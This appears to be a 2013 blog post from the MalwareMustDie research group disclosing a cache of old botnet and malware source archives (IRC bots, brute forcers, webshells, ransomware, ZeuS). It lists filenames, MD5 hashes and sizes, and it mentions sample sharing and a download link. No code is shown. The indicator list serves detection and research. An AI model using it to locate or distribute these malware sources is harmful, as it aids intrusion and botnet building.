
Samples


The sample is shared for the research purpose and raising the detection ratio.

Download is here -->>[MediaFire]

Additional

#MalwareMustDie!

Monday, June 3, 2013

Full disclosure of 309 Bots/Botnet Source Codes Found via Germany Torrent

Background

If you see the post's title well, this post is as per it is. A shocky, and took us a long time to confirm the source code one by one until we are pretty sure that the data is valid.

The data was found by our team member (thank's for the great and swift follow) after receiving an anonymous hint, it was found a torrent account which lead to a file-share contains these malicious contents. The account is under legal process to the authority and we grabbed all of the data as evidence, shortly after we retrieved the data and some "one on one" battle, the account was closed and the file shared was suddenly deleted.

The malware source is a bit old, mostly are data from 3-4years ago, most of them are bots/botnet clients source codes of various malicious implementation and some of them are still considered a "useable" stuff. After having a long internal discussion, we decided to full-disclose the information for sharing purpose to the AV/security industry, authority and known researchers only, sorry for the inconveniences that might occurred, please contact us for the sample request together with your introduction (as a good guys with credential *smile*). Upon the approved requests, we don't provide the downloads URL for you, we will push via FTP for the specific sources requested (the reason is: big size & security purpose) so please prepare your temporary FTP/FTPS account. I mean FTP, means no Dropbox, no Google Drive, no File Sharing, and please no argue about this, since we have our own security reason. In some cases we will demand the PGP/GPG keys for validation.

Below is the category (supported to PHP, UNIX & Windows native C codes):

Login Brute Forcer Bot
IRC Bot
WebShell
SqlInject Attack Bot
Virus/Malware Botnet Client
Spyware/Backdoor Bot

Snapshot

Some dangerous bots (snipped in picture):

Ransomware:

UNIX Bot (Client):

Sql Brutter Client:

IRC Worm:

ZeuS:

Hashes

The complete list of the sample:

DATESTAMP   TIME  MD5                              SIZE       FILENAME
------------------------------------------------------------------------------------------------------------------
2009/06/12  19:28 f3c4064ffc78852d07c4cb3f6b23f159    438,881 (rbot)x0n3-Satan-v1.0-Priv8-By-CorryL{x0n3-h4ck}.rar
2009/06/12  19:29 6c156b3e3fe269385076880bce7fc094  2,591,697 120 Moded By t0nixx.rar
2009/06/12  19:30 276717078dda96ddd1fa7da10bdaed99  1,861,648 120-MYSQL-V2.rar
2009/06/12  19:30 fda4772759e01da0ea6e3fbd29c5dddb  1,834,838 120-MYSQL-V999.rar
2009/06/12  19:29 49a53e3490283199c43c38d7833e36ad  1,598,898 120-MYSQL1THREAD-V2.rar
2009/06/12  19:30 3bfd0b7d99b578ac9262ed5c737a230c  1,846,551 120-MYSQLBRUTE-V2.rar
2009/06/12  19:30 eccbec0caf7be85f513b37a290ffbe06    311,471 120-PSTORE-MSSQL-SYM-NTPASS-VNC-NETAPI-2007.rar
2009/06/12  19:30 9888a260793b4cc1ce42e2238b94edc7  1,629,967 120-VnC-Brute+pStore.rar
2009/06/12  19:28 f025eae0375ff22154c6972fb60adfcf    159,305 120-[BruteTest]-V0.5.rar
2009/06/12  19:28 56ef53170406d8ea82154a1d1a65b964    329,645 120-[DVNC-TEST]-DDOS-V1.0.rar
2009/06/12  19:28 6c6aba1e5af4c3d6d558d6871e02118d    233,800 120-[ModBot]-SNIFF-VNCBRUTE-SP2FIX-NICK.rar
2009/06/12  19:28 13c08d0b13b3e75bf8f6ddbfb1e43ceb    243,298 120-[ModBot]-SP2FIX-SYM-VNCBRUTE.rar
2009/06/12  19:28 70da6fc1586ac3cd0a025ea0e6aad31a    146,865 120-[ModBot]-V0.5.rar
2009/06/12  19:28 ea6fc0ea066d3e835ef28a1c90949660    312,882 120-[ModBot]-V1.0.rar
2009/06/12  19:28 5b6c4675e1616e51da2bfdc6213148f7    265,415 120-[ModBot]-VNCBRUTE-MSSQL-2007.rar
2009/06/12  19:28 74fd34fc2b497602237402bbaedba8a2    240,382 120-[netapi-sym-mohaa]-(vncbrute-sp2patch).rar
2009/06/12  19:29 ad693fb4e2313fdc78b883c417f8ad3a    207,623 120-[SP2-PATCH-BRUTE]-V2.0.rar
2009/06/12  19:29 342aefc091d1e82cb8813e7bba535dda    196,201 120-[SP2-PATCH]-V2.0.rar
2009/06/12  19:28 4800ee7bc8a9e3f4d8a4f82722f02c42    228,752 120-[SP2FIX-VNCBrute-Mohaa]-STRIP V1.0.rar
2009/06/12  19:28 24ff016f81aa71a20df1226255960f12    240,027 120-[SP2FIX-VNCBrute-Mohaa]-Test V1.0.rar
2009/06/12  19:28 cac14cb51f4ece12a357759ac82df8dc    227,567 120-[SP2fix-VncBrute]-FINALV1.0.rar
2009/06/12  19:28 68c45a875dba68c638e1cb8d139d118a    283,206 @@ SKUZ FIXED DDOS @@.rar
2009/06/12  19:30 a05ef342a2d0059a6ef895a18d43922c    514,428 a.rar
2009/06/12  19:30 eef69909a5e0598b1045f16771e316dd    991,860 a59base.rar
2009/06/12  19:30 64f9e1ae1e6a578ffee4b9fb32868d45      8,460 acidBot.rar
2009/06/12  19:30 52670ac6c7bb1f7e971b0b6c7f28b146     10,821 acidBot2fix.rar
2009/06/12  19:30 9f8dc19511a188e8fdbd3f454d92df60      6,224 acidbotEncypt.rar
2009/06/12  19:30 1530eb627c220286792abbf0658c5b7a      7,841 Ad Clicker Bot - Private - Free-Hack VIP Tool.rar
2009/06/12  19:30 90a02f5853087a9f08ed4fddada1f81e  1,470,160 agobot3-0.2.1-pre4-priv.rar
2009/06/12  19:30 17488ed87161e959bf9ea1f25d206d78     66,405 AkBot-IRC--lsd-mod.rar
2009/06/12  19:30 9842020705382d29a3c3bc23dd2103f7     90,263 AkBot-x0r-dns.rar
2009/06/12  19:30 5c4e92b534053bb0217199ec7d85bc24    168,342 Akbot_v0.4.1_netapi_.rar
2009/06/12  19:30 20635cea0f079ca7cd4395da99f05a62    142,885 asn-pstore-spam.rar
2009/06/12  19:30 ed9f49a1bb5bf552c34fc5b8d942269b    141,693 aspergillus_1.3.rar
2009/06/12  19:30 9030d27bf842ff8233752724e10c7c81    402,767 bBot-Version_0.6.rar
2009/06/12  19:30 de08fa387c1148568104d61d7b8ae609     17,502 BioZombie 1.5 Beta.rar
2009/06/12  19:30 7a232e2c7ef0085d0fa1c4eb859d20d8    112,302 blacksun.rar
2009/06/12  19:31 99d56b1460686e0da2a1e1586cb021cd    278,984 BlowSXT.rar
2009/06/12  19:31 1fb2d733cf36e9d352dbb999fba0ea2c     60,462 bmw.rar
2009/06/12  19:31 1cf0cd89a05814fadddc835934226bb3     43,176 bot mods.rar
2009/06/12  19:31 2b36670d863e7a89586c6137a8f30d82    269,740 botnet200.zip
2009/06/12  19:31 e1dc44e0de020ecd29e5c1a0eaa93a8d      3,270 Brainbot_v1.5.zip
2009/06/12  19:31 fe7f5c930537a25c676c317f0f7ede55    185,794 CBot-Fixed Version.rar
2009/06/12  19:31 59a95e39a104798872084ab1954e42f1  2,119,050 ChodeBot C++ v1 base.rar
2009/06/12  19:31 54d994b223b34aa3793dac250f69ecb7    197,682 ciscobawt.rar
2009/06/12  19:32 7416e613bd89dc18876ee54054e2e28e    645,293 Crackbot_v1.4b-final_spin.zip
2009/06/12  19:31 e41507022a1c46d4667586150d6bff2e    192,638 Crx-realmbot.VNC+RFI.rar
2009/06/12  19:31 b38bdca4ae6d993258ff7b341ef641d3    197,107 Crx-realmbot_VNC_exploit.rar
2009/06/12  19:31 d826b47ee22d43edcc3e91213d7a6fa1    131,999 CYBERBOTv2.2-Stable.m0dd_ownz.DreamWoRK.rar
2009/06/12  19:31 b4bd7566c8f52504def1520daa619f10     89,904 CYBERBOTv4.0.rar
2009/06/12  19:31 b01e2800778e0356a7125d0b169016cb     19,352 C_15Pub pre4.c.rar
2009/06/12  19:31 aef6eeec9dab3614040924a42bc1e59a     26,398 C_15Pub.rar
2009/06/12  19:31 00c39caedea5396e5ef752c7124b6478    209,817 DarkAnalNKX-BACKDOOR-REMOVED.rar
2009/06/12  19:31 0cc93898910b2e28d11bcd6015df2d95    514,997 Darkness IRC Bot.rar
2009/06/12  19:31 4c736cb10035c4c1d938dd56a9392e73    470,970 Darkness.last.mod.rar
2009/06/12  19:31 613e31fde44dfb58bc5827382a6d2121    116,307 dbot-irc-sell.rar
2009/06/12  19:31 f47bde579b059da5d2100dc3d57addb6     67,747 Dbot.v3.1.rar
2009/06/12  19:32 c3c889b923b47f051b6aec0dac9c6b9b  2,676,329 DCI Bot.rar
2009/06/12  19:32 4f7e093d42e53daba32eb4be642ceab6    817,799 dci_bot.rar
2009/06/12  19:32 28088545580766d59a5980bb166262ab    100,233 dopebot.rar
2009/06/12  19:32 bc487a321f966901ccff083fdfb9d76d  1,159,465 dopebot0.22.rar
2009/06/12  19:32 bc487a321f966901ccff083fdfb9d76d  1,159,465 dopebot0.22.uncrippled.rar
2009/06/12  19:32 53bf7302b4d1652f82d66f810d8ee941    107,161 dopebot_2.0.rar
2009/06/12  19:32 64e29da4acd67784ac7902a8a7d5778e    128,622 dopebot_current.rar
2009/06/12  19:32 9f888ff2dff506e1275857865f8273ba    251,418 drx_realcast_woopie.rar
2009/06/12  19:33 a34bbb6b2ab99869ca9ce040954e1a54  1,113,713 fiesta Sploit-pack.rar
2009/06/12  19:33 2809919d7df5c98fb8d72179759b1271  2,776,404 ForBot_Olin-SYM-VNC-NETAPI-All_The_Public_Shit.rar
2009/06/12  19:33 1a5a554cf0d51a946bb39b41afb127d7    691,904 ForBot____sniffer__other_mods-_ch405_.rar
2009/06/12  19:33 94569dfd1e3c39b0887b15602d1282b4    910,480 frozenbot6.rar
2009/06/12  19:33 be9041ce8838fd8cc3fa19c9231307b4    218,854 fukj00.rar
2009/06/12  19:33 dc163d64564178a5228be6904e1a1afc     74,862 fungus.rar
2009/06/12  19:33 8f237784ce29a851a2c10e091bc7647f      1,365 fxBot_beta_.rar
2009/06/12  19:33 99013df00a00db8377a37edf96f43710    450,355 g-spotv2.0.rar
2009/06/12  19:33 cce327ac783ed2e03f3804a4711b2980     98,338 Gellbot_3.rar
2009/06/12  19:34 9f62032cec5bf5a6829f8f8ed62b4740    943,873 GENTOOreptile-base.rar
2009/06/12  19:33 e0e204b89ee612879184473714aea2f5    405,270 GigaBot-DCASS.rar
2009/06/12  19:33 e35b3b428bae342f9e9b5c416a444111     20,944 gsys3_final.zip
2009/06/12  19:34 1bcc13ffc13a60b61cc20de05323f78c    477,851 gt-badteam.rar
2009/06/12  19:34 7c9081af12474e58bf877e04f1fb6173    639,102 gt-virtualslut.rar
2009/06/12  19:34 f508da5fe53f643838b07bdb31f6173a    631,223 gt.zip
2009/06/12  19:33 a56fa0c5bc1f9adfcdbf10af4e40e958     18,085 gtbot-hackersteam.zip
2009/06/12  19:34 c216d6757a0a944881fa1038dc105a69     61,125 gtsev-spreader.rar
2009/06/12  19:34 c216d6757a0a944881fa1038dc105a69     61,125 gtsev-spreader_2_.rar
2009/06/12  19:34 4ba2a256f576f49fa6ddcc8b3ca850d3    461,610 H-Bot M0d 3.0 M0dd3d by TH & Sculay.rar
2009/06/12  19:34 4a242f6d83c001d6737ac1b743005784    582,435 H-Bot_M0d_3.0_M0dd3d_by_TH___Sculay.rar
2009/06/12  19:34 dc958fff0f8538c6cb1a1816b16b2586     16,116 h3xb0t.rar
2009/06/12  19:34 bc0d89415675a722f2af74b0c174ad29     28,672 h4x0rb0t_2.0_gt_edition.zip
2009/06/12  19:34 2ba073919798b49fda385298fe64d935  1,198,546 harvecter_bot.rar
2009/06/12  19:34 131e297fcb7b4097327352b11c078982     94,865 hdbotv0.2-ciscoscan.rar
2009/06/12  19:34 115881fb06d2ab57abf8afb7f4ae1815     88,956 hellbot10-06-05.rar
2009/06/12  19:34 3acba4c7f32087368937d7b4fdc29038     62,560 hellbot3[10-06-05].rar
2009/06/12  19:34 19b1ea7eb040789fa35d4e31909da225     90,126 hellbotv3.rar
2009/06/12  19:34 e1688beaf7b28f279abb90da00faeee8     16,905 hydra-2008.1.zip
2009/06/12  19:34 40a3282cf7e1d832ddfb4e6c33fc0252     17,443 I1.4b0.rar
2009/06/12  19:35 e09d194f790134f500c4c30aa0ff2388  1,231,092 icepack-ie7 mod.rar
2009/06/12  19:34 9d08ed0af3b70cd4fa0858698071c7d6    199,267 IHS-H-A-V003-Exploits.zip
2009/06/12  19:34 e23d9fde0bb6c1d84344bb291ad6afb3    495,581 iis-gt-bot.rar
2009/06/12  19:34 b7bb59167431b696a400c076b83ca22c    224,062 illusion_bot.rar
2009/06/12  19:34 3434dd0e03e545c647d0026d57dbb83b    248,553 Imbot1.3_V3.1.zip
2009/06/16  01:31 9d7f2f4c776062f7eb1300142bb44f6b     80,290 IMbotMod_V4.1.zip
2009/06/12  19:34 299ad5de20ba8c3c9182fdcb33016bc6    207,505 IMBOT_MOD.rar
2009/06/12  19:34 8493cbdc1fcb1caf3f32b9a8a548b179     97,313 IMBot_SRC_$$.rar
2009/06/12  19:34 eba95d73077c762dfd5c05fd871db38a    170,393 InTeL_m0dd-Test101-ms0640.rar
2009/06/12  19:34 2968af1c1a9ca3c1b8258f5902ec91c6    105,750 irbot0.15.rar
2009/06/15  20:15 ce35769c0538f13f599dcc5c0b6d9e96  2,555,449 ircd.tar.gz
2009/06/12  19:35 8e4c53d9673e44ff9df410288c5f0050     34,728 IrcWormv1.3-SourceCode.zip
2009/06/12  19:35 c52acf3396793f97bda614252bd8492d  1,991,254 IrINi_bot_0.1_public_limited_version_for_win32.rar
2009/06/12  19:35 63e0c87e11fd8e46111a5e734975d9f0    662,071 italian.zip
2009/06/12  19:35 ae71290e63db49bdda0ae0b0b8bfe88f    296,592 JRBOT_Modded_By__bloody_.rar
2009/06/12  19:35 3f7cf217ec499ba9d34e86e47cf08efe      8,643 kaiten.c.rar
2009/06/12  19:35 8dd36535dc8af32d6f398706b7f63c3e      7,322 knight.rar
2009/06/12  19:35 e44a741b6507ad9bb14c1ccd152a48ed      5,586 KoBRA-RFISCaN.EDiTEDBYBRaT.rar
2009/06/12  19:35 6cee5d68699c496c59afa6d9aeb2c75b     11,201 l0lw0rm.rar
2009/06/12  19:35 7f0657b3fb5ec9b67ce2487a8040ca05    227,961 LiquidBot_FixEd_By_Pr1muZ_anD_Ic3.rar
2009/06/12  19:35 4e8a71749ece0c3209f40c0304d1c7e2     86,201 litmus2-bot.rar
2009/06/12  19:35 4e8a71749ece0c3209f40c0304d1c7e2     86,201 litmus2-bot_2_.rar
2009/06/12  19:35 d43da1e84969c2eb0ba1ef760681e671      2,751 Lnknell.rar
2009/06/12  19:36 cbdbc295c611f1b1c6dcf11da45e4878  2,028,539 LoexBot.rar
2009/06/12  19:35 db5420ab2a883ed938aae77429573135    128,635 M0LdBotv1.0-small.rar
2009/06/12  19:35 9d90100354b9efeae6fc3f57ab0a036d    249,373 mm0d_asn_.rar
2009/06/12  19:35 9d90100354b9efeae6fc3f57ab0a036d    249,373 mmodbasn.rar
2009/06/12  19:35 f8bede07136fb166a0b4d197a24c7723    327,656 ModBot V1 Mod by iNs v0.2.rar
2009/06/12  19:36 1b521746de9dc8c77658d5bf9ed46786  1,387,852 MSDN(mirc scan bot).rar
2009/06/12  19:35 4ba39b27d1976eabc28cd71e515fac82     33,627 MSITBotWin.rar
2009/06/12  19:35 45b6ce6fef7e3e2d5769a3c2a1979daf     45,149 MSN Spread Bot Priv8.rar
2009/06/12  19:36 003a33c8e9701722179c99980bfdbfac    247,232 mystic-Urx.rar
2009/06/12  19:36 2d7328e87f0570a3bbd2ebdf76183cc7    240,673 mystic-Urx_Fixed_by_Pr1muz.rar
2009/06/12  19:36 88eac4e54021a2cf0ca8137f35b21bc2    647,269 my_poly_sploit ie6-ie7-op-firefox.rar
2009/06/12  19:36 8e4c63ff630c591d36dcb64dd7e1c15b    116,659 Nbot.rar
2009/06/12  19:36 3d0e097817ebd904fecd4645b8186b14    110,060 nbot032-update-5-28-08-enc_07-10am_.rar
2009/06/12  19:36 2d1927aa1a0a05d9e6ed1f8a4bc83579    213,512 NESBOT_v5.rar
2009/06/12  19:36 cb6e2ab433ddd93acc92b8127c408168    149,543 nesebot1.1r-ASN-PNP.rar
2009/06/12  19:36 ea9433508e84ece9647389999491a472    206,253 nesebot1.2.rar
2009/06/12  19:36 4bd17a046c2c34cd65210f386af85cb8    252,529 Netapi.Prueb-Norman.2oo6.Prif-Jessi-Off.rar
2009/06/12  19:36 4f1a198048010bebe6a496c2b6482756    211,737 New Folder.rar
2009/06/12  19:36 4d691657be055879d7961a5ccf845f1b    232,021 New_NZM_netapi_bot.rar
2009/06/12  19:36 1650de57781e5e2145c4aeebdc5c6ad5     14,946 niggerbot-vnc-nocrypt.rar
2009/06/12  19:36 8fc87d29d7ac4933c61a2c73df3174e8     94,040 NinjaBot.rar
2009/06/12  19:36 53ad266492c5ac6a166c2281e6bd2130     20,208 NITE-AIM.rar
2009/06/12  19:36 df8d52c0d08e277cc43c472dca2ed8cb     42,667 NtScan-rbot.rar
2009/06/12  19:36 96691ea655bf3dee6101a4af666d99b9    112,504 nullbot[2.1.1] [23-11-05].rar
2009/06/12  19:36 c14512df73863f6520fc04f095f74858    112,489 nullbot[finals].rar
2009/06/16  01:31 2c1c70b4fbbd2652051f6a8e48fc9ad7    252,691 NzM 3.0 By Ph3mt.rar
2009/06/12  19:37 1b2ef2799610f4db8fab315bd269123e    866,864 nzm-netapi.rar
2009/06/12  19:36 b2c297155d283e15aaa7de677ce1c831    447,772 nzmlite_sql.rar
2009/06/12  19:36 96045f06b6fe0b10ab8876a0ee120402    221,135 nzmlite_symantec___.rar
2009/06/12  19:36 5f6ebad8d78f6a60d9b2a084e503b855    401,538 nzm_priv_shit.rar
2009/06/12  19:36 36605f658061064219b2c7364250f478     66,557 oscar.rar
2009/06/12  19:36 4ff53675ff4cdd829da9b0a42f358e81      6,948 pBot.rar
2009/06/12  19:36 54566f2c6d73bd7837a5a51bfcaf38e6      6,397 pBot_v2.rar
2009/06/16  01:31 97351e9d23d352e6aa1f2b62e55f37c2    327,680 ri0t[v5].rar
2009/06/12  19:28 787edfdfdc5610c9f4b8cfb77de93399    533,970 _dkcs_ddos_bot.rar
2009/06/12  19:28 02cd4a3f219739942fb3f74468318f99    714,852 _Radmin-scanner_-EcKstasy.rar
2009/06/12  19:28 02c1edcbc84d3e1a173a377955c43bd6    677,164 _sHk-Bot.svchost-ns-dev.NOT-FOR-RELEASE_.rar
2009/06/12  19:40 6f1965b7156d0f45702b54f1ab1dcf9b   8,330,434 Phatbot-gh3tt0Bot.rar
2009/06/12  19:38 468c6a889d70027bef6e1b36915f6c88   3,072,230 Phatbot-NortonBot.rar
2009/06/12  19:38 343890fa7a2bf1456be638419d45302d   1,940,198 phatbot-SkYKr3w.rar
2009/06/12  19:39 7139728433d292be62fe205e6a17b76a   3,348,672 Phatbot-stoney.rar
2009/06/12  19:37 85a8b554fbecc76b04d584be7e023983   1,316,528 phatbot[11-20-04][PCAP][SYNSCAN].rar
2009/06/12  19:37 e0a856cdd29f7a94d5c55ceac9b942fc   1,500,349 phatbot_alpha1.rar
2009/06/12  19:38 dcc4bc9260c9b9b45900a30b4e3758f2       5,532 phb2.rar
2009/06/12  19:38 afc6284bb1e5ea18897c77708c6a7476       3,464 php_bot.rar
2009/06/12  19:38 dfa368e6624d8dc7e03a7e2c35d3e4e3     278,407 plague.gecko.netapi.rar
2009/06/12  19:38 f629aaf7d78d9020d8620407d84e0346     357,695 pr1vsrc-nzm-m0d-by-ibby.rar
2009/06/12  19:39 e6b2deed37a64d027fd537f4ecc062c3     247,327 private_enzyme_rxmod_04-04-05.rar
2009/06/12  19:39 7a76d91b3ac04e15e74e9a127553720c     257,317 prueva[1].Netapi.asn.m0dded-Norman.rar
2009/06/12  19:39 f8929c235aa51ded4f94e32cc778c4e4     247,912 prv_nzm-rx.sp2fix.rcast.rar
2009/06/12  19:47 63d5ce47604dd47e658be563606c7af8  19,031,884 PsyProxy.zip
2009/06/12  19:39 ee5de8ed6a9e8ae2fe1304222bd668a3     246,038 pwnBoT.rar
2009/06/12  19:39 fa302cd7352ad3e8420fa3ec8924f842       8,372 q8bot.zip
2009/06/12  19:39 f4ed84cdef31f7235f163d20668edf97     216,679 r00t3d.asn.ftp.lsass.by.Morgan.rar
2009/06/12  19:39 78c02f7ec3b5af667cccd7a2d3754f07     130,140 RAGEBOT.rar
2009/06/12  19:39 9a6d2a549b4ea49e3ede33b2f8957cb1     102,702 RAGEBOT[Clean].rar
2009/06/12  19:39 b946350e3f2348bf578803919ba9f65a      18,016 RansomWar.rar
2009/06/12  19:39 e61ca1f98b33e10a0f14e885ebdd2510       6,200 Ravbot.rar
2009/06/12  19:40 18dcba301450a14e3261225163991de3      28,629 rbot-LC-Priv8.rar
2009/06/12  19:41 36d130cbfd1fccb685ad42f303997a04     288,289 rBot-sxt-harro.rar
2009/06/12  19:40 20d6865263e96848754353930ffc3c74     120,044 rbot0.2-scionix-102b-working.rar
2009/06/12  19:40 88e0d9bfaf3dccc46230dc6d70495688     159,057 rBot0.3.3Pub.rar
2009/06/12  19:41 e86d83476b327e7df82d4cf43eb733b3     220,647 rBotv0.6.6-privlsass.rar
2009/06/12  19:40 839e1825a9580a03032de1bbf46b6059   1,169,550 rBot_0.2-MODE-by-akusot.v1.5.rar
2009/06/12  19:40 72dd0e30b85f0b3e64198520afa584da      72,666 rbot_dnsquery2007.rar
2009/06/12  19:40 0441ceff1c609627e0028c066e1a519a     415,849 rbot_netapi_vnc_ipswitch.rar
2009/06/12  19:40 234a3f399969dd621c71c6add8cc2a47      66,993 rBoT_oTh3R-dImeNsIoN_4.4x(2).rar
2009/06/12  19:40 234a3f399969dd621c71c6add8cc2a47      66,993 rBoT_oTh3R-dImeNsIoN_4.4x.rar
2009/06/12  19:41 62bc8519bf3eb573c58f23494b36ab00     247,426 Release no_cpp.rar
2009/06/12  19:41 2f4327515aff4a16196e460d55658382     317,296 reptile-small.rar
2009/06/12  19:42 d6a4075a7edbf3f6a8d24eae3c13bfbe   2,458,703 reptile.04.pnp.asn.ftpd.reload.rar
2009/06/12  19:41 82e4700bbd4e81643cb9f69dbe887ede   2,428,941 reptile.rar
2009/06/12  19:41 a92d4c607a2a4877b39b9e4a5399525b     234,311 Reptile._small_.DMG.Fixes.0x1FE.rar
2009/06/12  19:41 5a0e13a825e520c785848653e1fca8f4      97,352 rezo.ninjabot.zip
2009/06/12  19:41 53e7e66ffe37fc1d96c56dbec771d9e6     317,064 RFI-SCAN.V2.PRIVATE-1x33x7.rar
2009/06/12  19:42 f0a504aa728922406552dbfddd18df23     851,993 ri0tv5.rar
2009/06/12  19:42 1530ed8db18f47c23e9b94837865c93a     760,056 ri0t].rar
2009/06/12  19:42 c8ec81bb03371c8a176cb6e2589fb8c8     158,637 ri0t_v4.rar
2009/06/12  19:42 5cb7edb4ad178fb63b5d443dbf413798     344,515 ri0t_v5_.rar
2009/06/12  19:42 15de82b050ed3def8c3c7c8c0aa9e7a0      66,789 RNM5-Priv-Pr1muZ.rar
2009/06/12  19:42 bbba5301ca57ea9337720695861a3c62      72,004 rnm5b.rar
2009/06/12  19:42 fb6afedb3ab60fb63f9902fbef710aab     107,604 Rose v1.3 2007 by DreamWoRK.rar
2009/06/12  19:42 2053825af23c7ff10027d4c0d734daa8     200,570 Rose1.1.rar
2009/06/12  19:42 869243cb22e16b96b7ec60fa8f8f5a3c     268,082 Rose_2008.rar
2009/06/12  19:42 f2d9e3b23729e9d46043c77ff962badc     145,470 Rose_v1.3_2007_by_DreamWoRK.rar
2009/06/12  19:42 3bcf15b667707be1bab0d94b5b1a7380     127,851 Ruffbot1.2-MassAsnPrivShit-150705.rar
2009/06/12  19:42 d1744451650673b13465aec4b765f22f     425,351 Ruffbotv2.rar
2009/06/12  19:42 f53ad631bbccf511b883b55d6f1bdf1b     174,378 rx-14-09-06_Netapi_doyley.rar
2009/06/12  19:43 a27f77bf36e62ecb2032f401b6ee3204     324,778 rx-AKMod___msDTC1025- Stripp3d------sc4nn3rz.rar
2009/06/12  19:43 ec2561b44a61d041c398574086785e0c     319,638 rx-asn-2-re-worked v3.rar
2009/06/12  19:43 1e67d41177165910e435287db306a5d1     323,336 rx-asn-2-re-worked_v2.rar
2009/06/12  19:43 901c4b3f29a5cb17759bfab16834e57b     333,391 rx-asn-2-re-worked_v3.rar
2009/06/12  19:45 af68b52c74732143ebc8bbdb787fe02b   1,419,782 RX-GUTTED.rar
2009/06/12  19:45 aae2f25f6a723963c71367aee9423570     197,060 rx-sky2kpnpprivate.rar
2009/06/12  19:46 c13f005a869f4e94442bfb44181c7fbc   4,976,033 RX-STRIP-BOTKILLER-0.5.rar
2009/06/12  19:44 69b427aa15549ecfe51279f7b4469cb7     257,880 rxbot-EcLiPsE cReW 1.1.priv.rar
2009/06/12  19:44 69b427aa15549ecfe51279f7b4469cb7     257,880 rxbot-EcLiPsE-cReW-1.1.priv.rar
2009/06/12  19:44 3e3aa7373a0edbfb2dabeeafa4aa6813     284,100 RxBot-MP.rar
2009/06/12  19:44 576bc25b74b1db3a326a72d106a6a2b7     142,874 RXBOT-RevengE2005pnp.rar
2009/06/12  19:44 51d41661674d19d199f1d00b34565e6a     283,581 rxBot-sxt-harro.rar
2009/06/12  19:45 182b9c39d50551e35acb9dc59e194b67   1,011,736 rxbot-xerion-2.0.rar
2009/06/12  19:43 9a9e3aaf4ffd6de3a56cf71f614676c7     266,640 rxBot0.6.6b-priv-stable-CoKeHeAd.rar
2009/06/12  19:43 fdbc9c8665f8bccd6b521e8091f57f65     302,520 rxbot2006.rar
2009/06/12  19:43 40d47769b8cbb15bf3d7511510af8695     605,643 rxbot7.5.rar
2009/06/12  19:43 90e086817c78266f9009e53085b126c6     231,691 rxbot_0.65.zip
2009/06/12  19:43 a9ba6ca3eb4f040c3c7fca1ace9515a2     217,103 Rxbot_7.6-Modded-Tr0gdor.rar
2009/06/12  19:44 a9ba6ca3eb4f040c3c7fca1ace9515a2     217,103 Rxbot_7.6-Modded-Tr0gdor_2_.rar
2009/06/12  19:43 35481b70cdcc19d97eb63cf7bc8cb8cf     179,516 Rxbot_ak_7.7_fira_pviv8.rar
2009/06/12  19:44 f907e1af2bb422836f3302f4dcf23304     130,797 rxbot_undertow-6-10-05.rar
2009/06/12  19:44 5d88290eca0ad4478d75059f5ddf0c9e     210,216 rxbot_undertow-6-6-05ASN.rar
2009/06/12  19:44 af35f62151da19b2c5d419473bef33c2   2,047,507 rxbot_undertow[PnP]modded.memcpy.0.2.rar
2009/06/12  19:44 bef073118968d7bf99b195474a2c7cee     157,149 rxbot_v0.6.5_pk__lsdigital_spreader.rar
2009/06/12  19:44 3b62b52cae6a2942ecbf34d684c7619c     227,347 rxBot_v0.7.7_Sass.rar
2009/06/12  19:43 2121a41a5b764c4ec0557b42f24b2fc7     289,581 RXB__tM__d-VNC-NETAPI-ASN-2006.rar
2009/06/12  19:42 5aa288d2a1692673803d723ad59706e0      65,533 rx_dev+service+working_lsass+sasser+ftpd.rar
2009/06/12  19:42 9273d451ebdd01b9380efea5ea42948c     474,597 rx_dev_service_working_lsass_sasser_ftpd.rar
2009/06/12  19:43 5e3fd5677376500c00484d16f473bda5     217,685 rX_lsdigital_Mod_priv.rar
2009/06/12  19:43 0e739e4b87c4ff60888d31c4baef1684     258,739 Rx_Temptation.rar
2009/06/12  19:45 d74793f5072ad764f4428f6652fb3801       7,863 s5.rar
2009/06/12  19:49 798b16d4018b74a74555938deb06d619   1,858,529 Sbot-RARSpreader.rar
2009/06/12  19:45 7f480ebe0a8bd58ef49ad6579b1986e9      64,994 SBX.amk.0x00.rar
2009/06/12  19:45 b47655beb2153f8f9d8f906786b6461e     142,660 screens.zip
2009/06/12  19:45 2117589061d5ae386e68ac140b425106      89,489 sd with fake xdcc by Synco.zip
2009/06/12  19:46 5bbcbe76a73c8e7a0392c0e41867f5a3     100,167 sdbot i3s.rar
2009/06/12  19:47 7061b41082cf46b051c0f68a735065de      50,889 sdbot-ntpass-codefix-nils-22.10.03.rar
2009/06/12  19:46 a0bab8e230cc6f2bfa963dfb84416a3a      28,930 SDbot05b-getadm.rar
2009/06/12  19:46 b16e8a33e54e5fdcf721b1653b1afe81      57,481 sdbot05b_skbot__mods_by_sketch.rar
2009/06/12  19:46 99ab1f471ec8ea0ec12a0eff605af2d9     390,300 Sdbot_Hardcore_Mod_By_StOner.zip
2009/06/12  19:46 7e027233923c53a9d33c087e6e698dff      92,181 SDBot_with_NB spreader.rar
2009/06/12  19:47 6a9abbe9db6d919e30f42fc40484c5be      51,312 SDX.amk.0x00.rar
2009/06/12  19:46 06b17aecd7f744a502f0789f88c1e4c3     402,522 sd_bot_all.zip
2009/06/12  19:47 f26b2deb2d9fc65ad74554737df53d36   3,022,716 shadowbot-m3.rar
2009/06/12  19:47 dc626ec6e103da5aa5e34c9209b93096     116,185 shadowbot.rar
2009/06/12  19:47 227204fd6958067d53765b5145641904      86,441 shadowbotv3.rar
2009/06/12  19:47 1d5a6cd11731d12dbf980f00924c3e5d     521,820 shellbotFTP.rar
2009/06/12  19:47 02c1edcbc84d3e1a173a377955c43bd6     677,164 sHk-Bot.svchost-ns-dev.NOT-FOR-RELEASE.rar
2009/06/12  19:47 d3ecb7e97103009399f03519160e1168     204,781 SkuZ-BoT-V.1-2006-.rar
2009/06/12  19:47 25f9f0c5e37a4579fcd213b330cfb692     289,319 SkuZ-Netapi-VNC-IM.rar
2009/06/12  19:47 8586b8374c955d84ac360507eb169ce5      15,518 Sky Bot_incomplete.rar
2009/06/12  19:47 6c3e198b78774f4ce202b849e1acea38      46,185 Skype_Spread(PoC).7z
2009/06/12  19:47 7062e27b7b355f396f41134f5c297587       9,806 Small.rar
2009/06/12  19:47 e5f228844bfeeddf2a2c2c6452a6f1ec      90,650 SpazBot.rar
2009/06/12  19:47 fee0531a4bb6baae558752a149828f07     333,754 SpyBot Leechbot_r1.5a_private.rar
2009/06/12  19:47 eb1e2e57a68f536f7592e985d40d6fdd      35,088 spybot1.2-FULl.rar
2009/06/12  19:47 2163ce34a63d2088dfe4af673f4f0261      95,696 spybot1.4.zip
